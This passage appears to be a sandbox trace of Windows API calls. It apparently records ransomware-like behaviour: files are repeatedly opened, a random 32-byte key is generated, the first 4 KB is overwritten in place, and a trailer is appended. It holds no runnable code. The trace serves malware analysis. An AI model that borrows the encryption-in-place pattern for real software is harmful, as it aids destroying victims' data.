(HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.200] GetProcessHeap () returned 0x4f10000 [0081.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.200] GetProcessHeap () returned 0x4f10000 [0081.200] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.200] GetProcessHeap () returned 0x4f10000 [0081.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.200] GetProcessHeap () returned 0x4f10000 [0081.200] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.200] GetProcessHeap () returned 0x4f10000 [0081.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.200] GetProcessHeap () returned 0x4f10000 [0081.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.200] GetProcessHeap () returned 0x4f10000 [0081.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.200] GetProcessHeap () returned 0x4f10000 [0081.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.200] GetProcessHeap () returned 0x4f10000 [0081.200] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.200] SetFilePointerEx (in: hFile=0x878, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.200] WriteFile (in: hFile=0x878, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.201] WriteFile (in: hFile=0x878, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.201] GetProcessHeap () returned 0x4f10000 [0081.201] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.201] GetProcessHeap () returned 0x4f10000 [0081.201] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.201] GetProcessHeap () returned 0x4f10000 [0081.201] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.201] CloseHandle (hObject=0x878) returned 1 [0081.202] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 63 [0081.202] SetFilePointerEx (in: hFile=0x87c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.202] ReadFile (in: hFile=0x87c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.202] SetFilePointerEx (in: hFile=0x87c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.202] GetProcessHeap () returned 0x4f10000 [0081.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.202] GetProcessHeap () returned 0x4f10000 [0081.202] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.202] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.203] GetProcessHeap () returned 0x4f10000 [0081.203] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.203] ReadFile (in: hFile=0x87c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.307] SetFilePointerEx (in: hFile=0x87c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.307] WriteFile (in: hFile=0x87c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.308] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.308] GetProcessHeap () returned 0x4f10000 [0081.309] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.309] GetProcessHeap () returned 0x4f10000 [0081.309] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.310] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.310] GetProcessHeap () returned 0x4f10000 [0081.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.311] GetProcessHeap () returned 0x4f10000 [0081.311] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.312] GetProcessHeap () returned 0x4f10000 [0081.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.312] GetProcessHeap () returned 0x4f10000 [0081.312] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0081.312] GetProcessHeap () returned 0x4f10000 [0081.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.312] GetProcessHeap () returned 0x4f10000 [0081.312] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0081.312] GetProcessHeap () returned 0x4f10000 [0081.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0081.312] GetProcessHeap () returned 0x4f10000 [0081.312] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0081.312] GetProcessHeap () returned 0x4f10000 [0081.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0081.312] GetProcessHeap () returned 0x4f10000 [0081.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0081.312] GetProcessHeap () returned 0x4f10000 [0081.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0081.312] GetProcessHeap () returned 0x4f10000 [0081.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0081.312] GetProcessHeap () returned 0x4f10000 [0081.312] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0081.312] SetFilePointerEx (in: hFile=0x87c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.312] WriteFile (in: hFile=0x87c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0081.313] WriteFile (in: hFile=0x87c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0081.313] GetProcessHeap () returned 0x4f10000 [0081.313] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0081.313] GetProcessHeap () returned 0x4f10000 [0081.313] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0081.313] GetProcessHeap () returned 0x4f10000 [0081.313] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0081.313] CloseHandle (hObject=0x87c) returned 1 [0081.315] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 64 [0081.315] SetFilePointerEx (in: hFile=0x880, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.315] ReadFile (in: hFile=0x880, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0081.315] SetFilePointerEx (in: hFile=0x880, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.315] GetProcessHeap () returned 0x4f10000 [0081.315] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0081.315] GetProcessHeap () returned 0x4f10000 [0081.315] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0081.315] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0081.315] GetProcessHeap () returned 0x4f10000 [0081.315] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0081.315] ReadFile (in: hFile=0x880, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0081.428] SetFilePointerEx (in: hFile=0x880, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.428] WriteFile (in: hFile=0x880, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.429] GetProcessHeap () returned 0x4f10000 [0081.429] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.430] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.430] GetProcessHeap () returned 0x4f10000 [0081.431] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0081.431] GetProcessHeap () returned 0x4f10000 [0081.431] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) 